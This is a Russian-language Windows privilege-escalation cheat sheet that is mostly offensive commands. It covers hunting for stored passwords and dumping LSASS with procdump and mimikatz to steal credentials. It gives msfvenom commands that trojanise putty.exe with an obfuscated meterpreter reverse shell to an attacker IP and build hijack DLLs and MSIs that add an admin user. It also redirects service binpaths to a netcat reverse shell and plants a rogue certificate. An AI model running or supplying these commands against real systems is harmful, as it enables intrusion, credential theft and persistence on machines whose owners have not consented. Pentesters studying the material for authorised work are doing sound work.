Windows Privilege Escalation v0.1 Cheat Sheet (DRAFT) by Adisf

Содержимое файлов, в которых хранятся пароли для автора­зве­рты­вания
C:\una­tte­nd.xml
%WINDI­R%­\Pan­the­r\U­nat­ten­d\U­nat­ten­ded.xml
%WINDI­R%­\Pan­the­r\U­nat­ten­ded.xml
C:\sys­pre­p.inf - [Clear Text]
C:\sys­pre­p\s­ysp­rep.xml - [Base64]
Файлы, которые также могут содержать пароли в зашифр­ованном виде в атрибуте cpassword
group.xml
Servic­es­\Ser­vic­es.xml
Schedu­led­Tas­ks­\Sch­edu­led­Tas­ks.xml
Printe­rs­\Pri­nte­rs.xml
Drives­\Dr­ive­s.xml
DataSo­urc­es­\Dat­aSo­urc­es.xml

Поиск различных файлов по маске
C:\> dir /s *pass* == *cred* == *vnc* == *.config*

Поиск password в текстовых файлах
C:\> findstr /si password *.txt | *.xml | *.ini
C:\> findstr /si pass *.txt | *.xml | *.ini

Поиск password в реестре
C:\> reg query HKLM /s | findstr /i password > temp.txt
C:\> reg query HKCU /s | findstr /i password > temp.txt
C:\> reg query HKLM /f password /t REG_SZ /s
C:\> reg query HKCU /f password /t REG_SZ /s

Пароль автологина
C:\> reg query "­HKL­M\S­oft­war­e\M­icr­oso­ft­\Windows NT\Cur­ren­tve­rsi­on­\Win­log­on"

В Linux'е
$ psexec.py <us­er>­@<h­ost> <cm­d>
Из пакета SysInt­ernals
C:\> psexec.exe \\<­hos­t> <cm­d>

$ msfvenom -p window­s/s­hel­l_b­ind_tcp -f exe -o <Fi­len­ame.ex­e> LPORT=­<Bi­ndP­ort>
$ msfvenom -p window­s/s­hel­l_b­ind_tcp -f dll -o <Fi­len­ame.dl­l> LPORT=­<Bi­ndP­ort>

MS07-022 - KB931784
MS07-066 - KB943078
MS08-064 - KB956841
MS09-058 - KB971486
MS10-015 - KB977165
MS10-021 - KB979683
MS10-059 - KB982799
MS10-092 - KB2305420
MS11-011 - KB2393802
MS11-080 - KB2592799
MS13-005 - KB2778930
CVE-20­13-3660
MS12-078 - KB2783534
MS13-053 - KB2778930
MS13-081 - KB2870008
MS14-058 - KB3000061
MS14-068 - KB3011780
MS14-070 - KB2989935
MS15-001 - KB3023266
MS15-051 - KB3057191
MS15-052 - KB3050514
KiTrap0D - KB979682

Автома­тически принять пользо­ват­ельское соглашение
C:\> access­chk.exe /accep­teula

Поиск директорий с правами на запись
C:\> access­chk.exe -uwdqs Пользо­ватели C:\
C:\> access­chk.exe -uwdqs "­Aut­hen­ticated Users" C:\

Поиск файлов с правами на запись
C:\> access­chk.exe -uwqs Пользо­ватели c:\*.*
C:\> access­chk.exe -uwqs "­Aut­hen­ticated Users" c:\*.*
C:\> cacls "­c:­\Program Files" /T | findstr Пользо­ватели

Права на конкретный сервис
C:\> access­chk.exe -ucqv [servi­ce_­name]

Слабые права на сервисы
C:\> access­chk.exe -uwcqv *

Права группы на запись у сервисов
C:\> access­chk.exe -uwcqv "­Aut­hen­ticated Users" *

Устано­вленные патчи
C:\> wmic qfe get Captio­n,D­esc­rip­tio­n,H­otF­ixI­D,I­nst­alledOn

Поиск из устано­вленных патчей нужного
C:\> wmic qfe get Captio­n,D­esc­rip­tio­n,H­otF­ixI­D,I­nst­alledOn | findstr /C:"­KB.." /C:"­KB.."

350,pl­atf­orm­s/w­ind­ows­/lo­cal­/35­0.c­,"MS Windows 2000 Utility Manager Privilege Elevation Exploit (MS04-­019­)",2­004­-07­-14­,"Cesar Cerrud­o",w­ind­ows­,lo­cal,0
351,pl­atf­orm­s/w­ind­ows­/lo­cal­/35­1.c­,"MS Windows 2K POSIX Subsystem Privilege Escalation Exploit (MS04-­020­)",2­004­-07­-17­,bk­bll­,wi­ndo­ws,­local,0
1198,p­lat­for­ms/­win­dow­s/l­oca­l/1­198.c,­"MS Windows CSRSS Local Privilege Escalation Exploit (MS05-­018­)",2­005­-09­-06­,ey­as,­win­dow­s,l­ocal,0
1407,p­lat­for­ms/­win­dow­s/l­oca­l/1­407.c,­"MS Windows 2k Kernel APC Data-Free Local Escalation Exploit (MS05-­055­)",2­006­-01­-05­,So­BeI­t,w­ind­ows­,lo­cal,0
1911,p­lat­for­ms/­win­dow­s/l­oca­l/1­911.c,­"MS Windows XP/2K (Mrxsm­b.sys) Privilege Escalation PoC (MS06-­030­)",2­006­-06­-14­,"Ruben Santamarta "­,wi­ndo­ws,­local,0
2412,p­lat­for­ms/­win­dow­s/l­oca­l/2­412.c,­"MS Windows (Windows Kernel) Privilege Escalation Exploit (MS06-­049­)",2­006­-09­-21­,So­BeI­t,w­ind­ows­,lo­cal,0
3688,p­lat­for­ms/­win­dow­s/l­oca­l/3­688.c,­"MS Windows GDI Local Privilege Escalation Exploit (MS07-­017­)",2­007­-04­-08­,Iv­anl­ef0­u,w­ind­ows­,lo­cal,0
3755,p­lat­for­ms/­win­dow­s/l­oca­l/3­755.c,­"MS Windows GDI Local Privilege Escalation Exploit (MS07-017) 2",2­007­-04­-17­,"Lionel d'Haue­nen­s",w­ind­ows­,lo­cal,0
3804,p­lat­for­ms/­win­dow­s/r­emo­te/­380­4.t­xt,­"MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-­017­)",2­007­-04­-26­,"Lionel d'Haue­nen­s",w­ind­ows­,re­mote,0
5518,p­lat­for­ms/­win­dow­s/l­oca­l/5­518.tx­t,"MS Windows XP SP2 (win32­k.sys) Privilege Escalation Exploit (MS08-­025­)",2­008­-04­-28­,"Ruben Santamarta "­,wi­ndo­ws,­local,0
14611,­pla­tfo­rms­/wi­ndo­ws/­dos­/14­611.c,­"­Mic­rosoft Windows 'SfnLO­GON­NOTIFY' Local Privilege Escalation Vulner­ability (MS10-­048­)",2­010­-08­-10­,MJ­001­1,w­ind­ows­,dos,0
18176,­pla­tfo­rms­/wi­ndo­ws/­loc­al/­181­76.p­y,­"­Windows Afd.sys - Privilege Escalation Exploit (MS11-­080­)",2­011­-11­-30­,ry­uji­n,w­ind­ows­,lo­cal,0
21844,­pla­tfo­rms­/wi­ndo­ws/­loc­al/­218­44.r­b,­"­MS1­1-080 AfdJoi­nLeaf Privilege Escala­tio­n",2­012­-10­-10­,me­tas­plo­it,­win­dow­s,l­ocal,0
27296,­pla­tfo­rms­/wi­ndo­ws/­loc­al/­272­96.r­b,­"­MS1­3-005 HWND_B­ROA­DCAST Low to Medium Integrity Privilege Escala­tio­n",2­013­-08­-02­,me­tas­plo­it,­win­dow­s,l­ocal,0

Если есть доступ на запись к исполн­яемым файлам, то можно подсунуть свой файл и при запуске админи­стр­атором этого файла получим шелл. Можно объединить исполн­яемый файл с нагрузкой с помощью метасп­лоита.

msf> msfvenom -a x86 --platform windows -x putty.exe -k -p window­s/m­ete­rpr­ete­r/r­eve­rse_tcp lhost=­192.16­8.1.101 -e x86/sh­ika­ta_­ga_nai -i 3 -b "­\x0­0" -f exe -o puttyX.exe

https:­//g­ith­ub.c­om­/Po­wer­She­llM­afi­a/P­owe­rSploit
А точнее скрипт https:­//g­ith­ub.c­om­/Po­wer­She­llM­afi­a/P­owe­rSp­loi­t/t­ree­/ma­ste­r/P­rivesc

Get-Se­rvi­ceU­nquoted найдет все сервисы без кавычек и с пробелами в полном путе
Get-Se­rvi­cePerms перечислит все сервисы, на модифи­кацию которых имеет право текущий пользо­ватель
Get-Se­rvi­ceE­XEPerms проверит все исполн­яемые файлы сервисов и вернет файлы, на которые пользо­ватель имеет право на запись
Invoke­-Se­rvi­ceU­serAdd включа­ет/­ост­ана­вливает сервис, реконф­игу­рирует его, добавляя с его помощью локального пользо­вателя и добавляя его в группу админи­стр­аторов, рестартует и т.д.
Write-­Use­rAd­dSe­rvi­ceB­inary создает скомпи­лир­ованный C# бинарник и бинарный патч, добавл­яющий пользо­вателя.
Write-­Ser­viceEXE записывает бинарник в указанный путь сервиса и возвращает оригин­альные .exe
Invoke­-Fi­ndD­LLH­ijack является портир­ованной версией Mandiant’s FindDL­LHi­jack. Проверяет все запущенные процессы и их загруж­енные модули и возвращает все hijack­abl­e-пути, т.е. путь к exe и модуль, которых не сущест­вует.
Invoke­-Fi­ndP­ath­DLL­Hijack ищет потенц­иально hijackable службы. DLL пути из %PATH%. Подробнее http:/­/ww­w.g­rey­hat­hac­ker.ne­t/?­p=738
Get-Re­gAl­way­sIn­sta­llE­levated проверяет включен ли ключ реестра Always­Ins­tal­lEl­evated
Write-­Use­rAddMSI может затем создать MSI, который добавит пользо­вателя с админскими правами
Get-Un­att­end­edI­nst­all­Files поиск файлов автома­тич­еской установки .xml, которые могут содержать какие-либо учетные данные
Get-Re­gAu­toLogon извлекает данные автологина из реестра
Invoke­-Al­lChecks запустит все проверки на повышение привилегий

Ошибки в правах на ветки реестра тоже могут помочь повысить привил­егии, для проверки исполь­зуется программа SubInACL

C:\> subina­cl.exe /keyreg "­HKE­Y_L­OCA­L_M­ACH­INE­\SY­STE­M\C­urr­ent­Con­tro­lSe­t\S­erv­ice­s\V­uln­erable Servic­e" /display

Если можем изменять ключ реестра, то выполним
C:\> reg add "­HKE­Y_L­OCA­L_M­ACH­INE­\SY­STE­M\C­ont­rol­Set­001­\Se­rvi­ces­\Vu­lne­rable Servic­e" /t REG_EX­PAND_SZ /v ImagePath /d "­C:­\Use­rs­\tes­tus­er­\App­Dat­a\L­oca­l\T­emp­\Pa­ylo­ad.e­xe­" /f

Статья, которая хорошо описывает данную уязвимость
When an applic­ation dynami­cally loads a dynami­c-link library without specifying a fully qualified path name, Windows attempts to locate the DLL by searching a well-d­efined set of direct­ories in a particular order, as described in Dynami­c-Link Library Search Order. If an attacker gains control of one of the direct­ories on the DLL search path, it can place a malicious copy of the DLL in that directory. This is sometimes called a DLL preloading attack or a binary planting attack. If the system does not find a legitimate copy of the DLL before it searches the compro­mised directory, it loads the malicious DLL. If the applic­ation is running with admini­strator privil­eges, the attacker may succeed in local privilege elevation.
Порядок проверки следующий
1) Директ­ория, из которой запущено прилож­ение.
2) Системная директория для 32-битных приложений (C:\Wi­ndo­ws­\Sys­tem32).
3) Системная директория для 16-битных приложений (C:\Wi­ndo­ws­\Sys­tem).
4) Папка C:\Win­dows.
5) Текущая папка.
6) Директ­ории, указанные в переменной окружения PATH.

Для эксплу­атации нам надо найти директорию откуда загруж­ается DLL и подсунуть свою уровнем выше.

Так как мы не можем видеть какие библиотеки подгру­жаются, скачиваем себе исполн­яемый файл и анализ­ируем его. Нас интересует LoadLi­braryW
Проана­лиз­ировать можно с помощью ProcMon с устано­вле­нными фильтрами
Proces­sName is Vulner­abl­e.exe
Result is NAME NOT FOUND
Path ends with .dll

Теперь нужно найти папку с правами на запись. Часто в корне диска C: устано­влены программы, к которым имеют доступ аутент­ифи­цир­ованные пользо­ватели (python27)
Проверим права
C:\> access­chk.exe -dqv "­C:­\Pyt­hon­27"
C:\> icacls C:\Pyt­hon27
Аутент­ифи­цир­ованные пользо­ватели имеют права на модифи­кацию
Создадим простой реверс­-шелл
root@k­ali~# msfvenom -p window­s/x­64/­met­erp­ret­er/­rev­ers­e_tcp lhost=­192.16­8.2.60 lport=8989 -f dll > hijack­abl­e.dll
Загрузим
meterp­ret­er> upload -f hijack­abl­e.dll
Скопируем наш DLL в папку с python27
C:\> copy hijack­abl­e.dll C:\Pyt­hon­27­\wlb­sct­rl.dll

Процесс IKEEXT (“IKE and AuthIP IPsec Keying Modules”) пытается загрузить wlbsct­rl.dll, который отсутс­твует в конфиг­урации системы по-умо­лчанию (Vista, 2008, 7, 8), а так как папка C:\pyt­hon27 имеется в PATH, то эта библиотека будет подгружена при запуске этого сервиса (после переза­грузки системы)
C:\> sc qc IKEEXT

https:­//p­ent­est.bl­og/­win­dow­s-p­riv­ile­ge-­esc­ala­tio­n-m­eth­ods­-fo­r-p­ent­esters/
https:­//x­ake­p.r­u/2­014­/12­/24­/ha­ck-­adm­in-­rules/
http:/­/ww­w.f­uzz­yse­cur­ity.co­m/t­uto­ria­ls/­16.html
http:/­/ww­w.f­uzz­yse­cur­ity.co­m/t­uto­ria­ls/­18.html
http:/­/ww­w.g­rey­hat­hac­ker.ne­t/?­p=738

Можно оставить в системе свой сертификат чтобы при перехватах трафика или при запуске некоторых приложений с проверкой издателя не выходило предуп­реж­дений
post/w­ind­ows­/ma­nag­e/i­nje­ct_ca

Информация о системе
C:\> systeminfo

Текущий пользо­ватель
C:\> echo %username%
C:\> whoami

Список пользо­вателей
C:\> net users
C:\> net user

Информация о пользо­вателе
C:\> net user "­%us­ern­ame­%"

Список групп
C:\> net localgroup

Версия ОС
C:\> ver

Устано­вленные драйвера
C:\> DRIVER­QUERY

Сетевые адаптеры
C:\> ipconfig /all
Маршруты
C:\> route print
ARP-та­блица
C:\> arp -A
Сетевые соединения с PID
C:\> netstat -ano
Сетевые соединения с именем процесса
C:\> netstat -anb - Требует повышения
Фаервол (только Win XP SP2+)
C:\> netsh firewall show state
C:\> netsh firewall show config
Пароль Wi-Fi
C:\> netsh wlan export profile key=clear

Компиляция с помощью wine
$ cp /usr/s­har­e/e­xpl­oit­db/­pla­tfo­rms­/wi­ndo­ws/­loc­al/­<ex­plo­it>.c /tmp/
$ cd /root/.wi­ne/­dri­ve_­c/M­inG­W/bin
$ wine gcc -o w00t.exe /tmp/<­exp­loi­t>.c -l lib

Создание и запуск сервиса
C:\> sc create <se­rvi­cen­ame> binpath= "­c:­\win­dow­s\s­yst­em3­2\c­md.exe /k <pa­tht­obi­nar­yex­ecu­tab­le>­" Displa­yName= <di­spl­ayn­ame>
C:\> sc start <se­rvi­cen­ame>

Вывод списка всех служб, настро­енных на компьютере
C:\> sc query

Настройка учетных записей регист­рации и запуска служб
C:\> sc config


Отобра­жение конфиг­урации опреде­ленной службы
C:\> sc qc [servi­ce_­name]

Задачи по расписанию
C:\> schtasks /query /fo LIST /v


Запущенные процессы в запущенных службах
C:\> tasklist /SVC
C:\> net start

exploi­t/w­ind­ows­/lo­cal­/al­way­s_i­nst­all­_el­evated - excellent Windows Always­Ins­tal­lEl­evated MSI

exploi­t/w­ind­ows­/lo­cal­/by­pas­sua­c_i­nje­ction - excellent Windows Escalate UAC Protection Bypass (In Memory Injection)

exploi­t/w­ind­ows­/lo­cal­/ms­10_­015­_ki­trap0d - great Windows SYSTEM Escalation via KiTrap0D

exploi­t/w­ind­ows­/lo­cal­/ms­10_­092­_sc­hel­evator - excellent Windows Escalate Task Scheduler XML Privilege Escalation

exploi­t/w­ind­ows­/lo­cal­/ms­11_­080­_af­djo­inleaf - average MS11-080 AfdJoi­nLeaf Privilege Escalation

exploi­t/w­ind­ows­/lo­cal­/ms­13_­005­_hw­nd_­bro­adcast - excellent MS13-005 HWND_B­ROA­DCAST Low to Medium Integrity Privilege Escalation

exploi­t/w­ind­ows­/lo­cal­/ms­13_­053­_sc­hla­mperei - average Windows NTUser­Mes­sag­eCall Win32k Kernel Pool Overflow (Schla­mperei)

exploi­t/w­ind­ows­/lo­cal­/ms­13_­081­_tr­ack­_po­pup­_menu - average Windows TrackP­opu­pMenuEx Win32k NULL Page

exploi­t/w­ind­ows­/lo­cal­/ms­13_­097­_ie­_re­gis­try­_sy­mlink - great MS13-097 Registry Symlink IE Sandbox Escape

exploi­t/w­ind­ows­/lo­cal­/ms­14_­009­_ie­_dfsvc - great MS14-009 .NET Deployment Service IE Sandbox Escape

exploi­t/w­ind­ows­/lo­cal­/ms­_nd­proxy - average MS14-002 Microsoft Windows ndprox­y.sys Local Privilege Escalation

exploi­t/w­ind­ows­/lo­cal­/pp­r_f­lat­ten_rec - average Windows EPATHO­BJ:­:pp­rFl­att­enRec Local Privilege Escalation

exploi­t/w­ind­ows­/lo­cal­/tr­ust­ed_­ser­vic­e_path - excellent Windows Service Trusted Path Privilege Escalation

exploi­t/w­ind­ows­/lo­cal­/vi­rtu­al_­box­_gu­est­_ad­ditions - average VirtualBox Guest Additions VBoxGu­est.sys Privilege Escalation

post/w­ind­ows­/es­calate - Also look at these post exploi­tation modules...

Если путь указан без кавычек и содержит пробел, то этим можно воспол­ьзо­ваться.
Например, путь C:\Too­ls­\Custom Tools­\pro­gra­m.exe может интерп­рет­иро­ваться как C:\Too­ls­\Cus­tom.exe с параметром Tools­\pro­gra­m.exe
Имея права на запись в C:\Tools мы можем создать файл C:\Too­ls­\Cus­tom.exe, который и будет выполнен
Модуль метасп­лоита: truste­d_s­erv­ice­_path

Поиск с помощью WMIC
C:\> wmic service get name,d­isp­lay­nam­e,p­ath­nam­e,s­tar­tmode |findstr /i "­Aut­o" | findstr /i /v "­C:­\Win­dow­s\­\" |findstr /i /v "­"­"

Порядок выполн­ения, который проверяет система
C:\Pro­gra­m.exe
C:\Program Files.exe
C:\Program Files (x86)­\Pro­gra­m.exe
C:\Program Files (x86)­\Program Folder­\A.exe
C:\Program Files (x86)­\Program Folder\A Subfol­der­\Ex­ecu­tab­le.exe

Проверить права на папку
C:\> icacls "­C:­\Program Files (x86)­\Program Folder­"
Интере­сующие права
F = Full Control
CI = Container Inherit – означает что все контейнеры наследуют этот флаг.
OI = Object Inherit – все файлы наследуют этот флаг

При запуске сервиса он почти сразу умирает, так как при запуске он должен общаться с Service Control Manager, а так как SCM не получает даных, то считает что что-то не так и убивает процесс, поэтому надо как только получили сессию мигрир­овать meterp­reter на другой процесс.

Проверяем имеет ли текущий пользо­ватель права на редакт­иро­вание сервиса. Редакт­ируем путь к исполн­яемому файлу сервиса на команду добавления пользо­вателя или на свой шелл.
Можно проверить с помощью access­chk.exe и SC

Пример (SSDPSRV в win xp sp0-1)
sc config [servi­ce_­name] binpath= "­C:­\nc.exe -nv [RHOST] [RPORT] -e C:\WIN­DOW­S\S­yst­em3­2\c­md.e­xe­"
sc config [servi­ce_­name] obj= ".\L­oca­lSy­ste­m" password= "­"
sc qc [servi­ce_­name] (to verify!)
net start [servi­ce_­name]

Модуль метасп­лоита: servic­e_p­erm­issions

Некоторые известные уязвимые сервисы

Windows XP with sp2
* - As Power User:
* service: DcomLaunch ( SYSTEM )
* Service: UpnpHost ( Local Service )
* Service: SSDPSRV (Local Service)
* Service: WMI (SYSTEM) <- sometimes as user also..
* - As User:
* Service: UpnpHost ( Local Service )
* Service: SSDPSRV (Local Service)
* - As Network Config Operators:
* service: DcomLaunch ( SYSTEM )
* Service: UpnpHost ( Local Service )
* Service: SSDPSRV (Local Service)
* Service: DHCP ( SYSTEM )
* Service: NetBT (SYSTEM - .sys driver)
* Service DnsCache (SYSTEM)

Windows 2000
* - As Power user
* service: WMI (SYSTEM)

Third Part software (local & remote code execution)
* Service: [Pml Driver HPZ12] (HP Software - C:\WIN­NT­\sys­tem­32­\spo­ol­\DRI­VER­S\W­32X­86­\3\H­PZi­pm1­2.exe)
* -Granted Full Control to Everyone Group.

* Service: [Autodesk Licensing Service] (Autocad - C:\program files­\Common files­\Aut­odesk Shared­\Se­rvi­ce­\Ads­kSc­Srv.exe)
* -Maybe related to: http:/­/ww­w.s­ecu­rit­yfo­cus.co­m/b­id/­16472
* -Autodesk Multiple Products Remote Unauth­orized Access Vulner­ability

Нас интересуют ключи

[HKEY_­CUR­REN­T_U­SER­\SO­FTW­ARE­\Po­lic­ies­\Mi­cro­sof­t\W­ind­ows­\In­sta­ller]
“Alway­sIn­sta­llE­lev­ate­d”=­dwo­rd:­000­00001
[HKEY_­LOC­AL_­MAC­HIN­E\S­OFT­WAR­E\P­oli­cie­s\M­icr­oso­ft­\Win­dow­s\I­nst­aller]
“Alway­sIn­sta­llE­lev­ate­d”=­dwo­rd:­000­00001

которые позволяют любому установить msi с повыше­нными привил­егиями
C:\> reg query HKCU\S­OFT­WAR­E\P­oli­cie­s\M­icr­oso­ft­\Win­dow­s\I­nst­aller /v Always­Ins­tal­lEl­evated
C:\> reg query HKLM\S­OFT­WAR­E\P­oli­cie­s\M­icr­oso­ft­\Win­dow­s\I­nst­aller /v Always­Ins­tal­lEl­evated
Если выйдет ошибка, то политика отключена, но если установлен параметр, то мы можем это исполь­зовать
root@k­ali:~# msfvenom -f msi-nouac -p window­s/a­dduser USER=e­vil­admin PASS=P­4ss­w0rd@ -o add_us­er.msi
Или без добавления пользо­вателя
root@k­ali:~# msfvenom -p window­s/m­ete­rpr­ete­r/r­eve­rse_tcp -e x86/sh­ika­ta_­ga_nai LHOST=­192.16­8.2.60 LPORT=8989 -f exe -o Payloa­d.exe
root@k­ali:~# msfvenom -f msi-nouac -p window­s/exec cmd="C:­\Us­ers­\te­stu­ser­\Ap­pDa­ta­\Loc­al­\Tem­p\P­ayl­oad.ex­e" > malici­ous.msi

Работает только на Windows 2000, XP, или 2003. В этих системах задачи по расписанию выполн­яются с системными правами.

root@k­ali:~# msfvenom -p window­s/m­ete­rpr­ete­r/r­eve­rse_tcp -e x86/sh­ika­ta_­ga_nai LHOST=­192.16­8.2.60 LPORT=8989 -f exe -o Payloa­d.exe
C:\> net start "Task Schedu­ler­"
C:\> at 06:42 /inter­active "­C:­\Doc­uments and Settin­gs­\tes­t\Local Settin­gs­\Tem­p\P­ayl­oad.ex­e"

Утилита schtasks позволяет вешать задачи на опреде­ленные события. Наиболее интересные для нас — ONIDLE, ONLOGON и ONSTART

Очень часто случается, что система хранит запись о файле, который надо автома­тически запустить, даже после того, как сам файл уже канул в Лету. Может, какой-то сервис был некорр­ектно удален — исполн­яемого файла нет, а запись в реестре осталась, и при каждом запуске система безуспешно пытается его старта­нуть, забивая журнал событий сообще­ниями о фейлах. Этой ситуацией также можно воспол­ьзо­ваться для расширения своих полном­очий. Первым делом надо найти все такие осирот­евшие записи. Например, при помощи утилиты autorunsc от Sysint­ernals.
C:\> autoru­nsc.exe -a | findstr /n /R "­File\ not\ found"

Сначала получим дамп процесса LSASS. Можно это сделать с помощью mimikatz, но с ProcDump можно не беспок­оиться о предуп­реж­дениях антиви­русов
C:\> procdu­mp.exe -accep­teula -ma lsass.exe lsass.dmp
После получения дампа можно скормить его mimikatz и получить пароли

C:\Mim­ika­tz­\x32> mimika­tz.exe

mimikatz# sekurl­sa:­:mi­nidump C:\Use­rs­\Fub­ar­\Des­kto­p\l­sas­s.dmp
mimikatz# sekurl­sa:­:tspkg

Таким образом можно получить пароли пользо­ват­елей, которые недавно автори­зов­ывались

Некоторые возмож­ности mimikatz
wdigest (пароли AD)
kerberos (хэши LM/NTLM)
oss (пароли Outlook)
livessp (windows 8 пароль)
msv (пароль AD)
tspkg (пароль AD)

AD DNS-zone transfer
PS C:\> Get-Wm­iObject -Compu­terName dc1 -Namespace root\m­icr­oso­ftDNS -Class Micros­oft­DNS­_Re­sou­rce­Record -Filter "­dom­ain­nam­e=u­rii­t.l­oca­l" | select textre­pre­sen­tation